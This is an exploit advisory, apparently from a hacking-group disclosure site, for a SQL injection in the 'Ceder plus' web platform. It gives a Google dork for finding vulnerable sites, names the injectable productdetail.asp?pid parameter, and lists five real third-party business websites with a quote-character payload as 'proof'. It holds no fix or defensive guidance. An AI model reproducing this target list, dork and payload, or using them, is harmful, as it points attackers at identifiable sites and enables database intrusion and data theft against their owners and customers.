Sites powered by Ceder suffer from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
06b511a60c3a7012b99daab58bc1d44b215dd6a7dc0994bb8e341050d36c0759
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Ceder plus Sql Injection
Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.cedar-plus.com
|
| [\] Google Dork: intext:"Powered by ceder
plus"
|
| [\] Tested on: Windows,Linux
|-------------------------------------------------------------------------|
| [/] Exploit: Sql Injection
| [/] Location : [Target]/productdetail.asp?pid=[Sql
Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.becxtrading.nl/productdetail.asp?pid='
|
| [/] http://bosstrading.info/productdetail.asp?pid='
|
| [\] http://bossmachinery.be/productdetail.asp?pid='
|
| [/] http://www.dasime.nl/productdetail.asp?pid='
|
| [\] http://www.wetsports.nl/productdetail.asp?pid='
|-------------------------------------------------------------------------|
| [/]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|